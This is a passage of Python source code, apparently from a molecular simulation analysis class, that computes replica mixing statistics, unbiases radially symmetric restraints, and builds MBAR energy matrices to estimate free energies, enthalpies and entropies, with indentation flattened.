# Print observed transition probabilities.
nstates = mixing_statistics.transition_matrix.shape[1]
logger.info("Cumulative symmetrized state mixing transition matrix:")
str_row = "{:6s}".format("")
for jstate in range(nstates):
str_row += "{:6d}".format(jstate)
logger.info(str_row)
for istate in range(nstates):
str_row = ""
str_row += "{:-6d}".format(istate)
for jstate in range(nstates):
P = mixing_statistics.transition_matrix[istate, jstate]
if P >= cutoff:
str_row += "{:6.3f}".format(P)
else:
str_row += "{:6s}".format("")
logger.info(str_row)
# Estimate second eigenvalue and equilibration time.
perron_eigenvalue = mixing_statistics.eigenvalues[1]
if perron_eigenvalue >= 1:
logger.info('Perron eigenvalue is unity; Markov chain is decomposable.')
else:
equilibration_timescale = 1.0 / (1.0 - perron_eigenvalue)
logger.info('Perron eigenvalue is {0:.5f}; state equilibration timescale '
'is ~ {1:.1f} iterations'.format(perron_eigenvalue, equilibration_timescale)
)
# Print information about replica state index statistical efficiency.
logger.info('Replica state index statistical inefficiency is '
'{:.3f}'.format(mixing_statistics.statistical_inefficiency))
def _get_radially_symmetric_restraint_data(self):
"""Return the radially-symmetric restraint force used in the bound state.
Returns
-------
restraint_force : forces.RadiallySymmetricRestraintForce
The restraint force used in the bound state.
weights_group1 : list of openmm.unit.Quantity
The masses of the restrained atoms in the first centroid group.
weights_group2 : list of openmm.unit.Quantity
The masses of the restrained atoms in the second centroid group.
Raises
------
TypeError
If the end states don't have lambda_restraints set to 1.
forces.NoForceFoundError
If there are no radially-symmetric restraints in the bound state.
"""
logger.debug('Trying to get radially symmetric restraint data...')
# Check cached value.
if self._radially_symmetric_restraint_data is not None:
return self._radially_symmetric_restraint_data
# Isolate the end states.
logger.debug('Retrieving end thermodynamic states...')
end_states = self._get_end_thermodynamic_states()
# Isolate restraint force.
logger.debug('Isolating restraint force...')
system = end_states[0].system
restraint_parent_class = forces.RadiallySymmetricRestraintForce
# This raises forces.NoForceFoundError if there's no restraint to unbias.
force_idx, restraint_force = forces.find_forces(system, force_type=restraint_parent_class,
only_one=True, include_subclasses=True)
# The force is owned by the System, we have to copy to avoid the memory to be deallocated.
logger.debug('Deep copying restraint force...')
restraint_force = copy.deepcopy(restraint_force)
# Check that the restraint was turned on at the end states.
if end_states[0].lambda_restraints != 1.0 or end_states[-1].lambda_restraints != 1.0:
raise TypeError('Cannot unbias a restraint that is turned off at one of the end states.')
# Read the centroid weights (mass) of the restrained particles.
logger.debug('Retrieving particle masses...')
weights_group1 = [system.getParticleMass(i) for i in restraint_force.restrained_atom_indices1]
weights_group2 = [system.getParticleMass(i) for i in restraint_force.restrained_atom_indices2]
# Cache value so that we won't have to deserialize the system again.
self._radially_symmetric_restraint_data = restraint_force, weights_group1, weights_group2
logger.debug('Done.')
return self._radially_symmetric_restraint_data
# -------------------------------------------------------------------------
# MBAR creation.
# -------------------------------------------------------------------------
def get_effective_energy_timeseries(self, energies=None, neighborhoods=None, replica_state_indices=None):
"""
Generate the effective energy (negative log deviance) timeseries that is generated for this phase.
The effective energy for a series of samples x_n, n = 1..N, is defined as
u_n = - \ln \pi(x_n) + c
where \pi(x) is the probability density being sampled, and c is an arbitrary constant.
Parameters
----------
energies : ndarray of shape (K,L,N), optional, Default: None
Energies from replicas K, sampled states L, and iterations N.
If provided, then states input_sampled_states must also be provided.
neighborhoods : list of list of int, optional, Default: None
neighborhoods[iteration] is the list of states in the neighborhood of the currently sampled state
replica_state_indices : ndarray of shape (K,N), optional, Default: None
Integer indices of each sampled state (matching L dimension in input_energy).
that each replica K sampled every iteration N.
If provided, then states input_energies must also be provided.
Returns
-------
u_n : ndarray of shape (N,)
u_n[n] is the negative log deviance of the same from iteration ``n``
Timeseries used to determine equilibration time and statistical inefficiency.
"""
if energies is None and replica_state_indices is None:
# Case where no input is provided
energies, _, neighborhoods, replica_state_indices = self._read_energies(truncate_max_n_iterations=True)
elif (energies is not None) != (replica_state_indices is not None):
# XOR operator
raise ValueError("If input_energy or input_sampled_states are provided, "
"then the other cannot be None due to ambiguity!")
n_replicas, n_states, n_iterations = energies.shape
logger.debug("Assembling effective timeseries...")
# Check for log weights
has_log_weights = False
if self.has_log_weights:
has_log_weights = True
log_weights = self.read_log_weights()
f_l = - self.read_logZ(iteration=-1) # use last (best) estimate of free energies
logger.debug("log_weights: {}".format(log_weights))
logger.debug("f_k: {}".format(f_l))
u_n = np.zeros([n_iterations], np.float64)
# Slice of all replicas, have to use this as : is too greedy
replicas_slice = range(n_replicas)
for iteration in range(n_iterations):
# Slice the current sampled states by those replicas.
states_slice = replica_state_indices[:, iteration]
u_n[iteration] = np.sum(energies[replicas_slice, states_slice, iteration])
# Correct for potentially-changing log weights
if has_log_weights:
u_n[iteration] += - np.sum(log_weights[states_slice, iteration]) \
+ logsumexp(-f_l[:] + log_weights[:, iteration])
logger.debug("Done.")
return u_n
def _compute_mbar_decorrelated_energies(self):
"""Return an MBAR-ready decorrelated energy matrix.
The data is returned after discarding equilibration and truncating
the iterations to self.max_n_iterations.
Returns
-------
energy_matrix : energy matrix of shape (K,N) indexed by k,n
K is the total number of states observables are desired.
N is the total number of samples drawn from ALL states.
The nth configuration is the energy evaluated in the kth thermodynamic state.
samples_per_state : 1-D iterable of shape K
The number of samples drawn from each kth state.
The \sum samples_per_state = N.
"""
# energy_data is [energy_sampled, energy_unsampled, neighborhood, replicas_state_indices]
energy_data = list(self._read_energies(truncate_max_n_iterations=True))
# Use the cached information to generate the equilibration data.
sampled_energy_matrix, unsampled_energy_matrix, neighborhoods, replicas_state_indices = energy_data
number_equilibrated, g_t, Neff_max = self._get_equilibration_data(sampled_energy_matrix, neighborhoods, replicas_state_indices)
logger.debug("Assembling uncorrelated energies...")
if not self.use_full_trajectory:
for i, energies in enumerate(energy_data):
# Discard equilibration iterations.
energies = multistate.utils.remove_unequilibrated_data(energies, number_equilibrated, -1)
# Subsample along the decorrelation data.
energy_data[i] = multistate.utils.subsample_data_along_axis(energies, g_t, -1)
sampled_energy_matrix, unsampled_energy_matrix, neighborhood, replicas_state_indices = energy_data
# Initialize the MBAR matrices in ln form.
n_replicas, n_sampled_states, n_iterations = sampled_energy_matrix.shape
_, n_unsampled_states, _ = unsampled_energy_matrix.shape
n_total_states = n_sampled_states + n_unsampled_states
energy_matrix = np.zeros([n_total_states, n_iterations*n_replicas])
samples_per_state = np.zeros([n_total_states], dtype=int)
# Compute shift index for how many unsampled states there were.
# This assume that we set an equal number of unsampled states at the end points.
first_sampled_state = int(n_unsampled_states/2.0)
last_sampled_state = n_total_states - first_sampled_state
# Cast the sampled energy matrix from kln' to ln form.
energy_matrix[first_sampled_state:last_sampled_state, :] = self.reformat_energies_for_mbar(sampled_energy_matrix)
# Determine how many samples and which states they were drawn from.
unique_sampled_states, counts = np.unique(replicas_state_indices, return_counts=True)
# Assign those counts to the correct range of states.
samples_per_state[first_sampled_state:last_sampled_state][unique_sampled_states] = counts
# Add energies of unsampled states to the end points.
if n_unsampled_states > 0:
energy_matrix[[0, -1], :] = self.reformat_energies_for_mbar(unsampled_energy_matrix)
logger.debug("Found expanded cutoff states in the energies!")
logger.debug("Free energies will be reported relative to them instead!")
if self.use_online_data and self._online_data is not None:
# Do online data only if present and already exists as stored in self._online_data
temp_online = copy.deepcopy(self._online_data)
f_k_i = np.zeros(n_sampled_states + n_unsampled_states)
online_f_k = temp_online['initial_f_k']
f_k_i[first_sampled_state:last_sampled_state] = online_f_k
temp_online['initial_f_k'] = f_k_i
# Re-set the extra analysis_
self._extra_analysis_kwargs = {**temp_online, **self._user_extra_analysis_kwargs}
else:
# Possible reset of the final key if online was true then false to invalidate any online data.
self._extra_analysis_kwargs = {**self._user_extra_analysis_kwargs}
# These cached values speed up considerably the computation of the
# free energy profile along the restraint distance/energy cutoff.
self._decorrelated_u_ln = energy_matrix
self._decorrelated_N_l = samples_per_state
logger.debug('Done.')
return self._decorrelated_u_ln, self._decorrelated_N_l
def _compute_mbar_unbiased_energies(self):
"""Unbias the restraint, and apply restraint energy/distance cutoffs.
When there is a restraint to unbias, the function adds two extra unbiased
states at the end points of the energy matrix. Otherwise, the return value
is identical to self._compute_mbar_decorrelated_energies().
Returns
-------
unbiased_decorrelated_u_ln : np.array
A n_states x (n_sampled_states * n_unbiased_decorrelated_iterations)
array of energies (in kT), where n_unbiased_decorrelated_iterations
is generally <= n_decorrelated_iterations whe a restraint cutoff is
set.
unbiased_decorrelated_N_l : np.array
The total number of samples drawn from each state (including the
unbiased states).
"""
logger.debug('Checking if we need to unbias the restraint...')
# Check if we need to unbias the restraint.
unbias_restraint = self.unbias_restraint
if unbias_restraint:
try:
restraint_data = self._get_radially_symmetric_restraint_data()
except (TypeError, forces.NoForceFoundError) as e:
# If we don't need to unbias the restraint there's nothing else to do.
logger.debug(str(e) + ' The restraint will not be unbiased.')
unbias_restraint = False
if not unbias_restraint:
self._unbiased_decorrelated_u_ln = self._decorrelated_u_ln
self._unbiased_decorrelated_N_l = self._decorrelated_N_l
return self._unbiased_decorrelated_u_ln, self._unbiased_decorrelated_N_l
# Compute the restraint energies/distances.
restraint_force, weights_group1, weights_group2 = restraint_data
logger.debug('Found {} restraint. The restraint will be unbiased.'.format(restraint_force.__class__.__name__))
logger.debug('Receptor restrained atoms: {}'.format(restraint_force.restrained_atom_indices1))
logger.debug('ligand restrained atoms: {}'.format(restraint_force.restrained_atom_indices2))
# Compute restraint energies/distances.
logger.debug('Computing restraint energies...')
energies_ln, distances_ln = self._compute_restraint_energies(restraint_force, weights_group1,
weights_group2)
# Convert energies to kT unit for comparison to energy cutoff.
energies_ln = energies_ln / self.kT
logger.debug('Restraint energy mean: {} kT; std: {} kT'
''.format(np.mean(energies_ln), np.std(energies_ln, ddof=1)))
# Don't modify the cached decorrelated energies.
u_ln = copy.deepcopy(self._decorrelated_u_ln)
N_l = copy.deepcopy(self._decorrelated_N_l)
n_decorrelated_iterations_ln = u_ln.shape[1]
assert len(energies_ln) == n_decorrelated_iterations_ln, '{}, {}'.format(energies_ln.shape, u_ln.shape)
assert len(self._decorrelated_state_indices_ln) == n_decorrelated_iterations_ln
# Determine the cutoffs to use for the simulations.
restraint_energy_cutoff, restraint_distance_cutoff = self._get_restraint_cutoffs()
apply_energy_cutoff = restraint_energy_cutoff is not None
apply_distance_cutoff = restraint_distance_cutoff is not None
# We need to take into account the initial unsampled states to index correctly N_l.
n_unsampled_states = len(u_ln) - self.n_states
first_sampled_state_idx = int(n_unsampled_states / 2)
# Determine which samples are outside the cutoffs or have to be truncated.
columns_to_keep = []
for iteration_ln_idx, state_idx in enumerate(self._decorrelated_state_indices_ln):
if ((apply_energy_cutoff and energies_ln[iteration_ln_idx] > restraint_energy_cutoff) or
(apply_distance_cutoff and distances_ln[iteration_ln_idx] > restraint_distance_cutoff)):
# Update the number of samples generated from its state.
N_l[state_idx + first_sampled_state_idx] -= 1
else:
columns_to_keep.append(iteration_ln_idx)
# Drop all columns that exceed the cutoff(s).
n_discarded = n_decorrelated_iterations_ln - len(columns_to_keep)
logger.debug('Discarding {}/{} samples outside the cutoffs (restraint_distance_cutoff: {}, '
'restraint_energy_cutoff: {}).'.format(n_discarded, n_decorrelated_iterations_ln,
restraint_distance_cutoff,
restraint_energy_cutoff))
u_ln = u_ln[:, columns_to_keep]
# Add new end states that don't include the restraint.
energies_ln = energies_ln[columns_to_keep]
n_states, n_iterations = u_ln.shape
n_states_new = n_states + 2
N_l_new = np.zeros(n_states_new, N_l.dtype)
u_ln_new = np.zeros((n_states_new, n_iterations), u_ln.dtype)
u_ln_new[0, :] = u_ln[0] - energies_ln
u_ln_new[-1, :] = u_ln[-1] - energies_ln
# Copy old values.
N_l_new[1:-1] = N_l
u_ln_new[1:-1, :] = u_ln
# Expand the f_k_i if need be
try:
f_k_i_new = np.zeros(n_states_new, N_l.dtype)
f_k_i_new[1:-1] = self._extra_analysis_kwargs['initial_f_k'] # This triggers the KeyError Trap
self._extra_analysis_kwargs['initial_f_k'] = f_k_i_new # This triggers the ValueError trap
except (KeyError, ValueError):
# Not there, move on, or already set nothing to do
pass
# Cache new values.
self._unbiased_decorrelated_u_ln = u_ln_new
self._unbiased_decorrelated_N_l = N_l_new
logger.debug('Done.')
return self._unbiased_decorrelated_u_ln, self._unbiased_decorrelated_N_l
def _compute_restraint_energies(self, restraint_force, weights_group1, weights_group2):
"""Compute the restrain energies and distances for the uncorrelated iterations.
Parameters
----------
restraint_force : forces.RadiallySymmetricRestraintForce
The restraint force.
weights_group1 : list of float
The mass of the particle in the first CustomCentroidBondForce group.
weights_group2 : list of float
The mass of the particles in the second CustomCentroidBondForce group.
Returns
-------
restraint_energies_ln : openmm.unit.Quantity
A (n_sampled_states * n_decorrelated_iterations)-long array with
the restrain energies (units of energy/mole).
restraint_distances_ln : openmm.unit.Quantity or None
If we are not applying a distance cutoff, this is None. Otherwise,
a (n_sampled_states * n_decorrelated_iterations)-long array with
the restrain distances (units of length) for each frame.
"""
decorrelated_iterations = self._decorrelated_iterations # Shortcut.
decorrelated_iterations_set = set(decorrelated_iterations)
# Determine total number of energies/distances to compute.
# The +1 is for the minimization iteration.
n_frames_ln = self.n_replicas * len(decorrelated_iterations)
# Computing the restraint energies/distances is expensive and we
# don't want to recompute everything when _decorrelated_iterations
# changes (e.g. when max_n_iterations changes) so we keep the cached
# values of the iterations we have computed.
# The dictionary instead of a masked array is for memory efficiency
# since the matrix will be very sparse (especially with SAMS).
def extract_decorrelated(cached_dict, dtype, unit):
if not decorrelated_iterations_set.issubset(set(cached_dict)):
return None
decorrelated = np.zeros(n_frames_ln, dtype=dtype)
for replica_idx in range(self.n_replicas):
for iteration_idx, iteration in enumerate(decorrelated_iterations):
frame_idx = replica_idx*len(decorrelated_iterations) + iteration_idx
decorrelated[frame_idx] = cached_dict[iteration][replica_idx]
return decorrelated * unit
# We compute the distances only if we are using a distance cutoff.
_, compute_distances = self._get_use_restraint_cutoff()
# Check cached values.
if compute_distances and decorrelated_iterations_set.issubset(set(self._restraint_distances)):
compute_distances = False
if decorrelated_iterations_set.issubset(set(self._restraint_energies)) and not compute_distances:
return (extract_decorrelated(self._restraint_energies, dtype=np.float64, unit=_OPENMM_ENERGY_UNIT),
extract_decorrelated(self._restraint_distances, dtype=np.float32, unit=_MDTRAJ_DISTANCE_UNIT))
# Don't modify the original restraint force.
restraint_force = copy.deepcopy(restraint_force)
is_periodic = restraint_force.usesPeriodicBoundaryConditions()
# Store the indices of the restrained atoms in the reduced system.
analysis_indices = self._reporter.analysis_particle_indices
mapped_restrained_indices1 = restraint_force.restrained_atom_indices1
mapped_restrained_indices2 = restraint_force.restrained_atom_indices2
mapped_restrained_indices1 = [analysis_indices.index(index)
for index in mapped_restrained_indices1]
mapped_restrained_indices2 = [analysis_indices.index(index)
for index in mapped_restrained_indices2]
mapped_restrained_indices = (mapped_restrained_indices1 +
mapped_restrained_indices2)
# Create new system with only solute and restraint forces.
reduced_system = openmm.System()
for weight in weights_group1 + weights_group2:
reduced_system.addParticle(weight)
# Adapt the restraint force atom indices to the reduced system.
n_atoms1 = len(weights_group1)
n_atoms = n_atoms1 + len(weights_group2)
restraint_force.restrained_atom_indices1 = list(range(n_atoms1))
restraint_force.restrained_atom_indices2 = list(range(n_atoms1, n_atoms))
reduced_system.addForce(restraint_force)
# If we need to image the molecule, we need an MDTraj trajectory.
if compute_distances and is_periodic:
# Create topology with only the restrained atoms.
serialized_topography = self._reporter.read_dict('metadata/topography')
topography = utils.deserialize(serialized_topography)
topology = topography.topology
topology = topology.subset(self._reporter.analysis_particle_indices)
# Use the receptor as an anchor molecule and image the ligand.
anchor_molecules = [{a for a in topology.atoms if a.index in set(topography.receptor_atoms)}]
imaged_molecules = [{a for a in topology.atoms if a.index in set(topography.ligand_atoms)}]
# Initialize trajectory object needed for imaging molecules.
trajectory = mdtraj.Trajectory(xyz=np.zeros((topology.n_atoms, 3)), topology=topology)
# Create context used to compute the energies.
integrator = openmm.VerletIntegrator(1.0*units.femtosecond)
platform = openmm.Platform.getPlatformByName('CPU')
context = openmm.Context(reduced_system, integrator, platform)
# TODO: we need to provide a reporter generator to iterate over single
# TODO: iterations but reading automatically one chunksize at a time.
# chunk_size = self._reporter.checkpoint_interval
# iterations_groups = itertools.groupby(enumerate(decorrelated_iterations), key=lambda x: int(x[1] / chunk_size))
# Pre-computing energies/distances.
logger.debug('Computing restraint energies/distances...')
for iteration_idx, iteration in enumerate(decorrelated_iterations):
# Check if we have already computed this energy/distance.
if (iteration in self._restraint_energies and
(not compute_distances or iteration in self._restraint_distances)):
continue
self._restraint_energies[iteration] = {}
if compute_distances:
self._restraint_distances[iteration] = {}
# Read sampler states only if we haven't computed this iteration yet.
# Obtain solute only sampler states.
sampler_states = self._reporter.read_sampler_states(iteration=iteration,
analysis_particles_only=True)
for replica_idx, sampler_state in enumerate(sampler_states):
sliced_sampler_state = sampler_state[mapped_restrained_indices]
sliced_sampler_state.apply_to_context(context)
potential_energy = context.getState(getEnergy=True).getPotentialEnergy()
self._restraint_energies[iteration][replica_idx] = potential_energy / _OPENMM_ENERGY_UNIT
if compute_distances:
# Check if an analytical solution is available.
try:
distance = restraint_force.distance_at_energy(potential_energy) / _MDTRAJ_DISTANCE_UNIT
except (NotImplementedError, ValueError):
if is_periodic:
# Update trajectory positions/box vectors.
trajectory.xyz = (sampler_state.positions / _MDTRAJ_DISTANCE_UNIT).astype(np.float32)
trajectory.unitcell_vectors = np.array([sampler_state.box_vectors / _MDTRAJ_DISTANCE_UNIT],
dtype=np.float32)
trajectory.image_molecules(inplace=True, anchor_molecules=anchor_molecules,
other_molecules=imaged_molecules)
positions_group1 = trajectory.xyz[0][mapped_restrained_indices1]
positions_group2 = trajectory.xyz[0][mapped_restrained_indices2]
else:
positions_group1 = sampler_state.positions[mapped_restrained_indices1]
positions_group2 = sampler_state.positions[mapped_restrained_indices2]
positions_group1 /= _MDTRAJ_DISTANCE_UNIT
positions_group2 /= _MDTRAJ_DISTANCE_UNIT
# Set output arrays.
distance = compute_centroid_distance(positions_group1, positions_group2,
weights_group1, weights_group2)
self._restraint_distances[iteration][replica_idx] = distance
return (extract_decorrelated(self._restraint_energies, dtype=np.float64, unit=_OPENMM_ENERGY_UNIT),
extract_decorrelated(self._restraint_distances, dtype=np.float32, unit=_MDTRAJ_DISTANCE_UNIT))
def _get_use_restraint_cutoff(self):
"""Determine if we need to apply a cutoff on the restraint energies and/or distances."""
apply_distance_cutoff = isinstance(self.restraint_distance_cutoff, units.Quantity)
apply_energy_cutoff = isinstance(self.restraint_energy_cutoff, float)
# When both cutoffs are auto, use distance cutoff.
if self.restraint_distance_cutoff == 'auto' and not apply_energy_cutoff:
apply_distance_cutoff = True
elif self.restraint_energy_cutoff == 'auto' and self.restraint_distance_cutoff is None:
apply_energy_cutoff = True
return apply_energy_cutoff, apply_distance_cutoff
def _get_restraint_energies_distances_at_state(self, state_idx, get_energies=True, get_distances=True):
"""Return the restraint energies and distances for a single state."""
# Resolve negative indices.
if state_idx < 0:
state_idx = self.n_states + state_idx
replica_state_indices = self._reporter.read_replica_thermodynamic_states()
# Gather the state restraint energies/distances.
state_energies = [] if get_energies else None
state_distances = [] if get_distances else None
for state_data, cached_data in [(state_energies, self._restraint_energies),
(state_distances, self._restraint_distances)]:
if state_data is None:
continue
for iteration, states_data in cached_data.items():
# Find the replicas in this state.
replica_indices = np.where(replica_state_indices[iteration] == state_idx)[0]
for replica_idx in replica_indices:
state_data.append(states_data[replica_idx])
# Convert to the correct units.
if state_energies is not None:
state_energies = np.array(state_energies) * _OPENMM_ENERGY_UNIT / self.kT
if state_distances is not None:
state_distances = np.array(state_distances) * _MDTRAJ_DISTANCE_UNIT
return state_energies, state_distances
def _determine_automatic_restraint_cutoff(self, compute_energy_cutoff=True, compute_distance_cutoff=True):
"""Automatically determine the restraint cutoffs.
This must be called after _compute_restraint_energies(). The cutoffs are
determine as the 99.9%-percentile of the distribution of the restraint
energies/distances in the bound state.
"""
# Gather the bound state restraint energies/distances.
state0_energies, state0_distances = self._get_restraint_energies_distances_at_state(
state_idx=0, get_energies=compute_energy_cutoff, get_distances=compute_distance_cutoff)
# Compute cutoff as the 99.9%-percentile of the energies/distances distributions.
energy_cutoff = None
distance_cutoff = None
err_msg = ('Thermodynamic state 0 has not been sampled enough to '
'determine automatically the restraint {} cutoff.')
if compute_energy_cutoff:
if len(state0_energies) == 0:
raise InsufficientData(err_msg.format('energy'))
energy_cutoff = np.percentile(state0_energies, 99.9)
if compute_distance_cutoff:
if len(state0_distances) == 0:
raise InsufficientData(err_msg.format('distance'))
state0_distances /= _MDTRAJ_DISTANCE_UNIT
distance_cutoff = np.percentile(state0_distances, 99.9) * _MDTRAJ_DISTANCE_UNIT
return energy_cutoff, distance_cutoff
def _get_restraint_cutoffs(self):
"""Return the restraint energies and distance cutoff to be used for unbiasing."""
apply_energy_cutoff, apply_distance_cutoff = self._get_use_restraint_cutoff()
# Determine automatically the restraint distance cutoff is necessary.
if apply_distance_cutoff and self.restraint_distance_cutoff == 'auto':
_, restraint_distance_cutoff = self._determine_automatic_restraint_cutoff(compute_energy_cutoff=False)
logger.debug('Chosen automatically a restraint distance cutoff of {}'.format(restraint_distance_cutoff))
elif self.restraint_distance_cutoff == 'auto':
restraint_distance_cutoff = None
else:
restraint_distance_cutoff = self.restraint_distance_cutoff
# Determine automatically the restraint energy cutoff is necessary.
if apply_energy_cutoff and self.restraint_energy_cutoff == 'auto':
restraint_energy_cutoff, _ = self._determine_automatic_restraint_cutoff(compute_distance_cutoff=False)
logger.debug('Chosen automatically a restraint energy cutoff of {}kT'.format(restraint_energy_cutoff))
elif self.restraint_energy_cutoff == 'auto':
restraint_energy_cutoff = None
else:
restraint_energy_cutoff = self.restraint_energy_cutoff
return restraint_energy_cutoff, restraint_distance_cutoff
# -------------------------------------------------------------------------
# Observables.
# -------------------------------------------------------------------------
def _compute_free_energy(self):
"""
Estimate free energies of all alchemical states.
"""
nstates = self.mbar.N_k.size
# Get matrix of dimensionless free energy differences and uncertainty estimate.
logger.debug("Computing covariance matrix...")
try:
# pymbar 3
Deltaf_ij, dDeltaf_ij = self.mbar.getFreeEnergyDifferences()
except AttributeError:
# pymbar 4
results = self.mbar.compute_free_energy_differences()
Deltaf_ij = results['Delta_f']
dDeltaf_ij = results['dDelta_f']
# Matrix of free energy differences
logger.debug("Deltaf_ij:")
for i in range(nstates):
str_row = ""
for j in range(nstates):
str_row += "{:8.3f}".format(Deltaf_ij[i, j])
logger.debug(str_row)
# Matrix of uncertainties in free energy difference (expectations standard
# deviations of the estimator about the true free energy)
logger.debug("dDeltaf_ij:")
for i in range(nstates):
str_row = ""
for j in range(nstates):
str_row += "{:8.3f}".format(dDeltaf_ij[i, j])
logger.debug(str_row)
# Return free energy differences and an estimate of the covariance.
free_energy_dict = {'value': Deltaf_ij, 'error': dDeltaf_ij}
self._computed_observables['free_energy'] = free_energy_dict
def get_free_energy(self):
"""
Compute the free energy and error in free energy from the MBAR object
Output shape changes based on if there are unsampled states detected in the sampler
Returns
-------
DeltaF_ij : ndarray of floats, shape (K,K) or (K+2, K+2)
Difference in free energy from each state relative to each other state
dDeltaF_ij : ndarray of floats, shape (K,K) or (K+2, K+2)
Error in the difference in free energy from each state relative to each other state
"""
if self._computed_observables['free_energy'] is None:
self._compute_free_energy()
free_energy_dict = self._computed_observables['free_energy']
return free_energy_dict['value'], free_energy_dict['error']
def _compute_enthalpy_and_entropy(self):
"""Function to compute the cached values of enthalpy and entropy"""
(f_k, df_k, H_k, dH_k, S_k, dS_k) = self.mbar.computeEntropyAndEnthalpy()
enthalpy = {'value': H_k, 'error': dH_k}
entropy = {'value': S_k, 'error': dS_k}
self._computed_observables['enthalpy'] = enthalpy
self._computed_observables['entropy'] = entropy
def get_enthalpy(self):
"""
Compute the difference in enthalpy and error in that estimate from the MBAR object
Output shape changes based on if there are unsampled states detected in the sampler
Returns
-------
DeltaH_ij : ndarray of floats, shape (K,K) or (K+2, K+2)
Difference in enthalpy from each state relative to each other state
dDeltaH_ij : ndarray of floats, shape (K,K) or (K+2, K+2)
Error in the difference in enthalpy from each state relative to each other state
"""
if self._computed_observables['enthalpy'] is None:
self._compute_enthalpy_and_entropy()
enthalpy_dict = self._computed_observables['enthalpy']
return enthalpy_dict['value'], enthalpy_dict['error']
def get_entropy(self):
"""
Compute the difference in entropy and error in that estimate from the MBAR object
Output shape changes based on if there are unsampled states detected in the sampler
Returns
-------
DeltaH_ij : ndarray of floats, shape (K,K) or (K+2, K+2)
Difference in enthalpy from each state relative to each other state
dDeltaH_ij : ndarray of floats, shape (K,K) or (K+2, K+2)
Error in the difference in enthalpy from each state relative to each other state
"""
if self._computed_observables['entropy'] is None:
self._compute_enthalpy_and_entropy()
entropy_dict = self._computed_observables['entropy']
return entropy_dict['value'], entropy_dict['error']
def _get_equilibration_data(self, energies=None, neighborhoods=None, replica_state_indices=None):
"""Generate the equilibration data from best practices.
Note that many of the variable names (e.g. t0, g_t) in this function are named after the equations in
https://pubs.acs.org/doi/10.1021/acs.jctc.5b00784
These equations are summarized here: http://getyank.org/latest/algorithms.html#autocorrelate-algorithm
Parameters
----------
energies : ndarray of shape (K,L,N), optional, Default: None
Energies from replicas K, sampled states L, and iterations N.
If provided, then replica_state_indices must also be provided.
neighborhoods : numpy.ndarray with shape (n_replicas, n_states, n_iterations)
``neighborhoods[replica, state, iteration]`` is 1 if the energy for
replica ``replica`` at iteration ``iteration`` was computed for state ``state``,
0 otherwise
replica_state_indices : ndarray of shape (K,N), optional, Default: None
Integer indices of each sampled state (matching L dimension in input_energy).
that each replica K sampled every iteration N.
If provided, then states input_energies must also be provided.
Returns
-------
n_equilibration_iterations : int
Number of equilibration iterations discarded
statistical_inefficiency : float
Statistical inefficiency of production iterations
n_uncorrelated_iterations : float
Effective number of uncorrelated iterations
"""
if self._n_equilibration_iterations is not None and self._statistical_inefficiency is not None:
n_equilibration = self._n_equilibration_iterations
g_t = self._statistical_inefficiency
n_effective_max = (self.max_n_iterations - n_equilibration + 1) / g_t
else:
u_n = self.get_effective_energy_timeseries(energies=energies, neighborhoods=neighborhoods, replica_state_indices=replica_state_indices)
# For SAMS, if there is a second-stage start time, use only the asymptotically optimal data
t0 = self._n_equilibration_iterations if self._n_equilibration_iterations is not None else 1 # if self._n_equilibration_iterations was not specified, discard minimization frame
try:
iteration = len(u_n)
data = self._reporter.read_online_analysis_data(None, 't0')
t0 = max(t0, int(data['t0'][0]))
logger.debug('t0 found; using initial t0 = {} instead of 1'.format(t0))
except Exception as e:
# No t0 found
logger.debug('Could not find t0: {}'.format(e))
pass
# Discard equilibration samples.
# TODO: if we include u_n[0] (the energy right after minimization) in the equilibration detection,
# TODO: then number_equilibrated is 0. Find a better way than just discarding first frame.
i_t, g_i, n_effective_i = multistate.utils.get_equilibration_data_per_sample(u_n[t0:], max_subset=self._max_subset)
n_effective_max = n_effective_i.max()
i_max = n_effective_i.argmax()
n_equilibration = i_t[i_max] + t0
g_t = self._statistical_inefficiency if self._statistical_inefficiency is not None else g_i[i_max]
# Store equilibration data
self._equilibration_data = tuple([n_equilibration, g_t, n_effective_max])
logger.debug('Equilibration data:')
logger.debug(' number of iterations discarded to equilibration : {}'.format(n_equilibration))
logger.debug(' statistical inefficiency of production region : {}'.format(g_t))
logger.debug(' effective number of uncorrelated samples : {}'.format(n_effective_max))
return n_equilibration, g_t, n_effective_max
# -------------------------------------------------------------------------
# Cached properties.
# -------------------------------------------------------------------------
unbias_restraint = CachedProperty('unbias_restraint', check_changes=True)
restraint_energy_cutoff = CachedProperty('restraint_energy_cutoff', check_changes=True)
restraint_distance_cutoff = CachedProperty('restraint_distance_cutoff', check_changes=True)
_equilibration_data = CachedProperty(
name='equilibration_data',
dependencies=['reporter', 'max_n_iterations'],
check_changes=True,
)
@_equilibration_data.default
def _equilibration_data(self, instance):
return instance._get_equilibration_data()
_decorrelated_state_indices_ln = CachedProperty(
name='decorrelated_state_indices_ln',
dependencies=['equilibration_data', 'use_full_trajectory'],
)
@_decorrelated_state_indices_ln.default
def _decorrelated_state_indices_ln(self, instance):
"""Compute the replica thermodynamic state indices in ln formats."""
decorrelated_iterations = instance._decorrelated_iterations # Shortcut.
replica_state_indices = instance._reporter.read_replica_thermodynamic_states()
n_correlated_iterations, instance._n_replicas = replica_state_indices.shape
# Initialize output array.
n_frames = instance.n_replicas * len(decorrelated_iterations)
decorrelated_state_indices_ln = np.zeros(n_frames, dtype=np.int32)
# Map ln columns to the state.
for iteration_idx, iteration in enumerate(decorrelated_iterations):
for replica_idx in range(instance.n_replicas):
frame_idx = replica_idx*len(decorrelated_iterations) + iteration_idx
# Set output array.
state_idx = replica_state_indices[iteration, replica_idx]
decorrelated_state_indices_ln[frame_idx] = state_idx
instance._decorrelated_state_indices_ln = decorrelated_state_indices_ln
return decorrelated_state_indices_ln
_decorrelated_u_ln = CachedProperty(
name='decorrelated_u_ln',
dependencies=['equilibration_data', 'use_full_trajectory'],
)
@_decorrelated_u_ln.default
def _decorrelated_u_ln(self, instance):
return instance._compute_mbar_decorrelated_energies()[0]
_decorrelated_N_l = CachedProperty(
name='decorrelated_N_l',
dependencies=['equilibration_data', 'use_full_trajectory'],
)
@_decorrelated_N_l.default
def _decorrelated_N_l(self, instance):
return instance._compute_mbar_decorrelated_energies()[1]
_unbiased_decorrelated_u_ln = CachedProperty(
name='unbiased_decorrelated_u_ln',
dependencies=['unbias_restraint', 'restraint_energy_cutoff', 'restraint_distance_cutoff',
'decorrelated_state_indices_ln', 'decorrelated_u_ln', 'decorrelated_N_l'],
)
@_unbiased_decorrelated_u_ln.default
def _unbiased_decorrelated_u_ln(self, instance):
return instance._compute_mbar_unbiased_energies()[0]
